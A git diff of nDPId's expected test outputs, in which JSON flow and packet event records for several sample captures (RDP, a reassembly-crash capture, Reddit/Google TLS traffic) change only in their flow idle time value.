-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1559207465138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1559207465138,"pkt":"AgAAAEUAAEAAAEAAQAbIuKwQArnAqAKOzQ4NPfm84lgAAAAAsML\/\/7iqAAACBAT5AQMDBQEBCAoLUEqcAAAAAAQCAAA="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1559207465180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1559207465180,"pkt":"AgAAAEUAADRflEAAfwYqMMCoAo6sEAK5DT3NDkeav7z5vOJZgBL6AEVOAAACBAW0AQMDAAEBBAI="} -00431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1559207465181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"thread_ts_msec":1559207465181,"pkt":"AgAAAEUAACgAAEAAQAbI0KwQArnAqAKOzQ4NPfm84llHmr+9UBAgAGAaAAA="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1559207465138,"flow_last_seen":1559207465181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1559207465181,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing 
Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} -00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2010,"flow_first_seen":1559207465138,"flow_last_seen":1559207472692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1273,"flow_tot_l4_payload_len":534243,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1559207472692,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559207465138,"flow_last_seen":1559207465138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1559207465138,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1559207465138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1559207465138,"pkt":"AgAAAEUAAEAAAEAAQAbIuKwQArnAqAKOzQ4NPfm84lgAAAAAsML\/\/7iqAAACBAT5AQMDBQEBCAoLUEqcAAAAAAQCAAA="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1559207465180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1559207465180,"pkt":"AgAAAEUAADRflEAAfwYqMMCoAo6sEAK5DT3NDkeav7z5vOJZgBL6AEVOAAACBAW0AQMDAAEBBAI="} +00431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1559207465181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"thread_ts_msec":1559207465181,"pkt":"AgAAAEUAACgAAEAAQAbI0KwQArnAqAKOzQ4NPfm84llHmr+9UBAgAGAaAAA="} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1559207465138,"flow_last_seen":1559207465181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1559207465181,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing 
Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} +00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2010,"flow_first_seen":1559207465138,"flow_last_seen":1559207472692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1273,"flow_tot_l4_payload_len":534243,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1559207472692,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","packets-captured":2010,"packets-processed":2010,"total-skipped-flows":0,"total-l4-data-len":534243,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1559207472692} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2010/2010 diff --git a/test/results/reasm_crash_anon.pcapng.out b/test/results/reasm_crash_anon.pcapng.out index 7b56ac794..88076737b 100644 --- a/test/results/reasm_crash_anon.pcapng.out +++ b/test/results/reasm_crash_anon.pcapng.out 
@@ -1,14 +1,14 @@ 00469{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1410865705717} -00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1410865705717,"flow_last_seen":1410865705717,"flow_idle_time":7440000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1410865705717,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1410865705717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1410865705717,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAEEBjUAAQAbTicCokZMK0QiUyBJV7zv7Y\/\/dkdtagBghO+7bAAABAQgKPplWKzpg4vE8ZGV0YWlscyAvPg0K"} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1410865705717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1410865705717,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAEEBjUAAQAbTicCokZMK0QiUyBJV7zv7Y\/\/dkdtagBghO+7bAAABAQgKPplWKzpg4vE8ZGV0YWlscyAvPg0K"} -00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1410865705719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1410865705719,"pkt":"AAAAAQAGUrCAkIlsAAAIAEUAAH6lHkAAQAYvuwrRCJTAqJGTVe\/IEt2R21o7+2QM0BgBxZZgqqoBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 
+00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1410865705717,"flow_last_seen":1410865705717,"flow_idle_time":7560000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1410865705717,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1410865705717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1410865705717,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAEEBjUAAQAbTicCokZMK0QiUyBJV7zv7Y\/\/dkdtagBghO+7bAAABAQgKPplWKzpg4vE8ZGV0YWlscyAvPg0K"} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1410865705717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1410865705717,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAEEBjUAAQAbTicCokZMK0QiUyBJV7zv7Y\/\/dkdtagBghO+7bAAABAQgKPplWKzpg4vE8ZGV0YWlscyAvPg0K"} 
+00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1410865705719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1410865705719,"pkt":"AAAAAQAGUrCAkIlsAAAIAEUAAH6lHkAAQAYvuwrRCJTAqJGTVe\/IEt2R21o7+2QM0BgBxZZgqqoBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":15,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":45,"global_ts_msec":1410865765918} 00388{"packet_event_id":1,"packet_event_name":"packet","packet_id":15,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":81,"pkt_l4_len":0,"thread_ts_msec":1410865735821,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAAUEBk0AAQAbShMCokZMK0QiUyBJV7zv7ZBndkeFwgBghOxJYAAABAQgKPppBVDphzho8ZGV0YWlscyAvPg0K"} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":17,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":86,"global_ts_msec":1410865765920} 00447{"packet_event_id":1,"packet_event_name":"packet","packet_id":17,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"thread_ts_msec":1410865765918,"pkt":"AAAAAQAGUrCAkIlsAAAIAEUAAHqlIkAAQAYvvArRCJTAqJGTVe\/IEt2R4XA7+xsmgBgBxWJIAAABAQgKOmJDrj6aQVQ8ZGV0YWlscyBpZD0iIiA+Cgk8dXB0aW1lJQAyNzQ3ODY8L3VwdGltZT4KPC9kZXRhaWxzPgo="} 
-00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":34,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1410865705717,"flow_last_seen":1410865856223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":725,"flow_tot_l4_payload_len":3945,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1410865856223,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":34,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1410865705717,"flow_last_seen":1410865856223,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":725,"flow_tot_l4_payload_len":3945,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1410865856223,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":45,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1410865916424} 00372{"packet_event_id":1,"packet_event_name":"packet","packet_id":45,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":1410865916424,"pkt":"AAQAAQAGplhD8kgGAAAIAEUAEDQBpEAAQAbDgMCokZMK0QiUyBJV7zv7ZGfdkfOygBAhO8pkAAABAQgKPpyNPTpkj5Y="} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":113,"packet_id":68,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1410866097027} 
@@ -25,7 +25,7 @@ 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":170,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","packets-captured":170,"packets-processed":161,"total-skipped-flows":0,"total-l4-data-len":6132,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":25,"global_ts_msec":1410866909737} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":113,"packet_id":190,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1410867060242} 00374{"packet_event_id":1,"packet_event_name":"packet","packet_id":190,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":1410867060242,"pkt":"AAQAAQAGplhD8kgGAAAIAEUARjQCFUAAQAaND8CokZMK0QiUyBJV7zv7ZlXdkmR\/gBAhO29pAAABAQgKPq4BRzp2A6k="} -00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":209,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1410865705717,"flow_last_seen":1410867180785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":725,"flow_tot_l4_payload_len":6327,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1410867180785,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":209,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1410865705717,"flow_last_seen":1410867180785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":725,"flow_tot_l4_payload_len":6327,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1410867180785,"l3_proto":"ip4","src_ip":"192.168.145.147","dst_ip":"10.209.8.148","src_port":51218,"dst_port":21999,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":209,"source":"reasm_crash_anon.pcapng","alias":"nDPId-test","packets-captured":209,"packets-processed":200,"total-skipped-flows":0,"total-l4-data-len":6327,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1410867180785} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 209/200 diff --git a/test/results/reddit.pcap.out b/test/results/reddit.pcap.out index 428be341a..e45fae61d 100644 --- a/test/results/reddit.pcap.out +++ b/test/results/reddit.pcap.out 
@@ -1,449 +1,449 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"reddit.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"reddit.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1605291684451} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684451,"flow_last_seen":1605291684451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684451,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1605291684451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684451,"pkt":"qtsDr8lk5EKm5WPyht1gBBqZACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnFwBu4Sgd8UAAAAAoAL9IJAlAAACBAWgBAIICtTdYAcAAAAAAQMDBw=="} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684451,"flow_last_seen":1605291684451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684451,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1605291684451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684451,"pkt":"qtsDr8lk5EKm5WPyht1gDERGACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnF4Bu+Ka2YUAAAAAoAL9INBoAAACBAWgBAIICtTdYAcAAAAAAQMDBw=="} 
-00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684452,"flow_last_seen":1605291684452,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684452,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605291684452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684452,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iiLjUAAAAAoAL9IMZSAAACBAWgBAIICql037gAAAAAAQMDBw=="} -00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605291684476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684476,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbucXOWkwh+EoHfGoBJXgJjYAAACBAV4AQMDAwQCCArC1zJs1N1gBw=="} 
-00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1605291684476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684476,"pkt":"qtsDr8lk5EKm5WPyht1gBBqZACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnFwBu4Sgd8blpMIggBAB+xzRAAABAQgK1N1gIMLXMmw="} -00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684476,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
